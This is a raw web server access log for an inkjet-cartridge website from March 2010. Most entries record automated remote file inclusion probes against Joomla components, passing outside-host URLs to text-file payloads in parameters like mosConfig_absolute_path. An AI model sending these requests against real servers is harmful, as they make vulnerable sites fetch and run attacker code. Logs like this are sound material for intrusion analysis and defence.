116.127.121.117 - - [01/Mar/2010:21:54:51 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
208.80.193.38 - - [01/Mar/2010:21:54:56 -0800] "GET / HTTP/1.0" 200 2116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; yie6_SBC; YPC 3.2.0; yplus 5.1.04b)" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:21:56:15 -0800] "GET /logs/access.log%20%20/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:21:56:15 -0800] "GET /logs/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:21:56:15 -0800] "GET /admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:21:56:25 -0800] "GET /logs/access.log%20%20/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:21:56:25 -0800] "GET /admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:21:56:26 -0800] "GET /logs/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:21:58:08 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:21:58:08 -0800] "GET /logs/access_100101.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:21:58:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:21:58:36 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:22:00:52 -0800] "GET /logs/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:22:00:52 -0800] "GET /admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:22:00:52 -0800] "GET /logs/access.log%20%20/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.192.48.157 - - [01/Mar/2010:22:08:02 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://sunderguild.com/guildbank/templates/cache/readme.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "site.inkjetcartridge.com"
67.192.48.157 - - [01/Mar/2010:22:08:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://sunderguild.com/guildbank/templates/cache/readme.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:22:08:37 -0800] "GET /logs/access.log/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:22:09:33 -0800] "GET /logs/access.log/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:22:10:21 -0800] "GET /logs/access.log/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:22:14:31 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:22:14:31 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:22:14:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:22:16:51 -0800] "GET /phpbb/viewtopic.php?p=1959 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:22:17:43 -0800] "GET /logs/scripts.log/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.195.225 - - [01/Mar/2010:22:19:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:22:21:01 -0800] "GET /phpbb/viewtopic.php?p=4546 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
207.46.195.225 - - [01/Mar/2010:22:21:13 -0800] "GET /logs/access_100101.log HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
81.171.234.51 - - [01/Mar/2010:22:24:21 -0800] "GET /logs/access.log HTTP/1.0" 200 305749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:22:25:18 -0800] "GET /phpbb/viewtopic.php?p=741 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
194.39.140.100 - - [01/Mar/2010:22:26:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [01/Mar/2010:22:26:43 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [01/Mar/2010:22:26:43 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
84.38.160.77 - - [01/Mar/2010:22:28:22 -0800] "GET /logs/scripts.log//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "site.inkjetcartridge.com"
84.38.160.77 - - [01/Mar/2010:22:28:22 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "site.inkjetcartridge.com"
84.38.160.77 - - [01/Mar/2010:22:28:22 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "site.inkjetcartridge.com"
194.39.140.100 - - [01/Mar/2010:22:29:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [01/Mar/2010:22:29:32 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [01/Mar/2010:22:29:32 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.201.82.173 - - [01/Mar/2010:22:29:43 -0800] "GET /logs/scripts.log//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
122.201.82.173 - - [01/Mar/2010:22:29:43 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
122.201.82.173 - - [01/Mar/2010:22:29:43 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
84.38.160.77 - - [01/Mar/2010:22:30:57 -0800] "GET /logs/scripts.log%20//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:22:32:02 -0800] "GET /logs/access_091201.log%20%20/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:22:32:02 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:22:32:02 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.201.82.173 - - [01/Mar/2010:22:32:39 -0800] "GET /logs/scripts.log%20//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
87.230.93.144 - - [01/Mar/2010:22:33:05 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://suphan.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.230.93.144 - - [01/Mar/2010:22:33:05 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://suphan.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.230.93.144 - - [01/Mar/2010:22:33:05 -0800] "GET /logs/access_100101.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://suphan.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.157.211.204 - - [01/Mar/2010:22:33:22 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://suphan.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.157.211.204 - - [01/Mar/2010:22:33:22 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://suphan.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.157.211.204 - - [01/Mar/2010:22:33:22 -0800] "GET /logs/access_100101.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://suphan.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:22:33:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:22:33:26 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:22:33:26 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.230.93.144 - - [01/Mar/2010:22:33:41 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://suphan.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:22:35:28 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:22:35:28 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:22:35:28 -0800] "GET /logs/access_091201.log/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.240.113.151 - - [01/Mar/2010:22:44:40 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://chainat.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.240.113.151 - - [01/Mar/2010:22:44:40 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://chainat.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.240.113.151 - - [01/Mar/2010:22:44:40 -0800] "GET /logs/access_100101.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://chainat.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:22:47:33 -0800] "GET /phpbb/viewtopic.php?t=2219 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
93.187.203.171 - - [01/Mar/2010:22:54:33 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
93.187.203.171 - - [01/Mar/2010:22:54:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
93.187.203.171 - - [01/Mar/2010:22:54:33 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:18:27 -0800] "GET /phpbb/viewtopic.php?t=2081&view=previous HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:27:37 -0800] "GET /phpbb/viewtopic.php?t=616 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:23:28:43 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:23:28:43 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:23:28:43 -0800] "GET /logs/access.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:23:29:34 -0800] "GET /logs/access_091201.log%20%20/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:23:29:34 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:23:29:34 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:23:29:39 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:23:29:39 -0800] "GET /logs/access.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:23:29:39 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:23:32:47 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:23:32:47 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:23:32:47 -0800] "GET /logs/access_100101.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:39:21 -0800] "GET /links/links16.html HTTP/1.0" 200 29593 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:39:34 -0800] "GET /phpbb/viewtopic.php?t=213&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:23:44:52 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:23:44:52 -0800] "GET /logs/access_100101.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:23:44:52 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:44:53 -0800] "GET /links/links6_2.html HTTP/1.0" 200 38946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:50:23 -0800] "GET /phpbb/viewtopic.php?p=247 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:50:28 -0800] "GET /phpbb/viewtopic.php?p=1460 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:51:50 -0800] "GET /phpbb/viewtopic.php?p=5682 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:56:38 -0800] "GET /phpbb/viewtopic.php?p=4439 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:23:59:32 -0800] "GET /phpbb/viewtopic.php?p=359 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:00:06:39 -0800] "GET /phpbb/viewtopic.php?t=860&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:08:51 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:08:51 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:08:52 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:09:09 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:09:10 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:09:10 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:00:11:47 -0800] "GET /phpbb/viewtopic.php?t=161 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
116.127.121.117 - - [02/Mar/2010:00:12:55 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [02/Mar/2010:00:12:55 -0800] "GET /logs/scripts.log%20%20//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [02/Mar/2010:00:12:55 -0800] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:00:17:52 -0800] "GET /phpbb/viewtopic.php?t=503 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:18:03 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:18:03 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:18:04 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:18:16 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:18:16 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:18:17 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [02/Mar/2010:00:18:36 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
